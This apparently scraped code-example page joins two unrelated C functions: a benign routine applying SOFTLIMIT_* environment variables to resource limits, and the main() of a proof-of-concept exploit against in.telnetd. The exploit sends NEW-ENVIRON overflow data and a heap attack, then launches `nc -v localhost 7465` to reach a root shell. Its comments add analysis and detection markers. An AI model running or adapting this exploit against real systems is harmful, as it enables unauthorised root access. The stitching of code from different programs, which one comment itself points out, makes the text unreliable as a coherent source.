Esempio n. 1
/*
 * Hand every SOFTLIMIT_* variable that has a matching RLIMIT_* resource on
 * this platform to doenv(), in one fixed order.  doenv() is defined
 * elsewhere; presumably it reads the named variable and applies its value
 * to the resource, but that is not visible here.
 *
 * Several resources are visited twice: their specific variable first, then
 * SOFTLIMIT_MEMBYTES, so one generic memory bound can cover AS/VMEM, DATA,
 * MEMLOCK and STACK together.  The table keeps exactly the same call order
 * as the original unrolled sequence.  Resources the platform does not
 * define are simply absent from the table; the zero sentinel keeps the
 * array non-empty (and the loop a no-op) on a system with no RLIMIT_* at
 * all.
 */
static void doallenv(void)
{
  static const struct {
    int resource;
    const char *var;
  } limits[] = {
#ifdef RLIMIT_AS
    { RLIMIT_AS,      "SOFTLIMIT_ALLBYTES" },
    { RLIMIT_AS,      "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_VMEM
    { RLIMIT_VMEM,    "SOFTLIMIT_ALLBYTES" },
    { RLIMIT_VMEM,    "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_CORE
    { RLIMIT_CORE,    "SOFTLIMIT_COREBYTES" },
#endif
#ifdef RLIMIT_DATA
    { RLIMIT_DATA,    "SOFTLIMIT_DATABYTES" },
    { RLIMIT_DATA,    "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_FSIZE
    { RLIMIT_FSIZE,   "SOFTLIMIT_FILEBYTES" },
#endif
#ifdef RLIMIT_MEMLOCK
    { RLIMIT_MEMLOCK, "SOFTLIMIT_LOCKEDBYTES" },
    { RLIMIT_MEMLOCK, "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_STACK
    { RLIMIT_STACK,   "SOFTLIMIT_STACKBYTES" },
    { RLIMIT_STACK,   "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_NOFILE
    { RLIMIT_NOFILE,  "SOFTLIMIT_OPENFILES" },
#endif
#ifdef RLIMIT_OFILE
    { RLIMIT_OFILE,   "SOFTLIMIT_OPENFILES" },
#endif
#ifdef RLIMIT_NPROC
    { RLIMIT_NPROC,   "SOFTLIMIT_PROCS" },
#endif
#ifdef RLIMIT_RSS
    { RLIMIT_RSS,     "SOFTLIMIT_RSSBYTES" },
#endif
#ifdef RLIMIT_CPU
    { RLIMIT_CPU,     "SOFTLIMIT_CPUSECS" },
#endif
    { 0 }   /* sentinel: var == null pointer ends the walk */
  };
  int i;

  for (i = 0; limits[i].var; i++)
    doenv(limits[i].resource, limits[i].var);
}
/*
 * Entry point of a proof-of-concept that drives a telnet NEW-ENVIRON
 * option exchange against a local in.telnetd and then replaces itself with
 * `nc -v localhost 7465`.  Everything it sends is visible on the wire, so
 * the fixed tokens commented below ("zen-parse" in USER/TERM, the
 * "[ : yes]" marker, port 7465) are the natural things for a network or
 * host detection rule to key on.
 *
 * Reviewer note: this function uses a different helper set than doallenv()
 * above -- here doenv() takes two strings, there an RLIMIT_* resource and a
 * string -- so the two blocks do not come from the same program.
 *
 * `main` has no declared return type (implicit int, removed in C99); the
 * function never returns normally anyway, it ends in execlp() or exit().
 *
 * Options (each must be followed by a value to take effect; no further
 * validation):
 *   --pause       run a fixed shell one-liner listing in.telnetd, wait 8 s
 *   --size N      mipl = atoi(N); non-numeric input silently becomes 0
 *   --name NAME   only strlen(NAME) is kept, in dalen; the text is unused
 *
 * mipl, dalen, oldenv, offsets, offset3, ninbufoffset, dasock, tosend and
 * ENV are all file-scope names defined elsewhere.
 */
main (int argc, char *argv[])
{
  /* l, spin, w and percent are declared but never used here. */
  int br, l, dosleep = 0;
  int percent = 0;
  char spin;
  unsigned char w;
  bzero (oldenv, sizeof (oldenv));
  argv++;                            /* skip argv[0], the program name */
  dalen = strlen ("clarity.local");  /* default name length: 13 */
  while (argv[0])
    {
      if (!strcmp (argv[0], "--pause"))
        dosleep = 1;

      /* atoi() reports no errors: garbage input yields mipl == 0. */
      if (!strcmp (argv[0], "--size") && argv[1])
        {
          mipl = atoi (argv[1]);
          argv++;
        }

      /* Only the length of the name is recorded, never its contents. */
      if (!strcmp (argv[0], "--name") && argv[1])
        {
          dalen = strlen (argv[1]);
          argv++;
        }
      argv++;
    }
  fprintf (stderr, "  o MiPl of %4d  o NameLen of %2d\n", mipl, dalen);
  /* Choose the offset table.  When the name length is a multiple of 3 the
     precomputed offset3 table replaces offsets wholesale; otherwise
     offsets[11] is scaled by mipl in 8192-byte steps and must still fit in
     one byte. */
  if(dalen%3==0)
  {
   offsets=offset3;
  }
  else
  {
   ninbufoffset = mipl % 8192;
   offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
   if (offsets[11] > 255)
     {
       /* The format string has no conversions, so mipl and dalen are
          ignored, and no trailing newline is printed. */
       fprintf (stderr, "  ! MiPl too big.", mipl, dalen);
       exit (1);
     }
   }
  sock_setup ();   /* defined elsewhere; presumably initialises dasock */
  if (dosleep)
    {
      /* Fixed command string passed to system(): lists in.telnetd on the
         local host.  That `ps aux | grep in.telnetd` child is itself an
         observable artifact on the host running this tool. */
      system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
      sleep (8);
    }

  /* Adds 12 bytes: the literal "\r\n[ : yes]\r\n" marker counts toward the
     name-length budget used below. */
  dalen += strlen ("\r\n[ : yes]\r\n");
  fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
  fflush (stderr);
  /* Telnet option numbers: 5 = STATUS, 39 = NEW-ENVIRON (RFC 1572).
     doo()/will()/wont() are defined elsewhere; presumably they write
     IAC DO/WILL/WONT sequences to dasock, since dasock is flushed after
     each group. */
  doo (5);
  will (39);
  fflush (dasock);
  read_sock ();
  fprintf (stderr, "o Setting up environment vars...\n");
  fflush (stderr);
  will (1);                          /* 1 = ECHO */
  push_clean ();
  /* Fixed NEW-ENVIRON values: "zen-parse" as both USER and TERM is a
     literal the server side, or a sensor on the link, can match on. */
  doenv ("USER", "zen-parse");
  doenv ("TERM", "zen-parse");
  will (39);
  fflush (dasock);
  fprintf (stderr, "o Doing overflows...\n");
  fflush (stderr);
  /* offsets[] is apparently walked as pairs until a zero pair: the first
     element is added to mipl + ENV, the second is passed as the length to
     fill().  Each fill() is followed by a 100 ms pause and a read of
     whatever the server answered. */
  for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)
    {
      fill (mipl + ENV + offsets[br], offsets[br + 1]);
      fflush (dasock);
      usleep (100000);
      read_sock ();
    }
  fprintf (stderr, "o Overflows done...\n");
  fflush (stderr);
  push_clean ();

  fprintf (stderr, "o Sending IACs to start login process...\n");
  fflush (stderr);
  /* 24 = TERMINAL-TYPE, 32 = TERMINAL-SPEED, 35 = X-DISPLAY-LOCATION */
  wont (24);
  wont (32);
  wont (35);
  fprintf (dasock, "%s", tosend);    /* tosend is a file-scope string */
  will (1);
  push_heap_attack ();
  sleep (1);
  fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
  /* Replaces this process with `nc -v localhost 7465`.  The argument-list
     terminator is the int constant 0 rather than a null char pointer; on
     ABIs where int and char * differ in size that is undefined behaviour
     for a variadic call.  The lines below run only if execlp() fails. */
  execlp ("nc", "nc", "-v", "localhost", "7465", 0);
  fprintf (stderr,
           "o If the exploit worked, there should be an open port on 7465.\n");
  fprintf (stderr, "  It is a root shell. You should probably close it.\n");
  fflush (stderr);
  sleep (60);
  exit (0);
}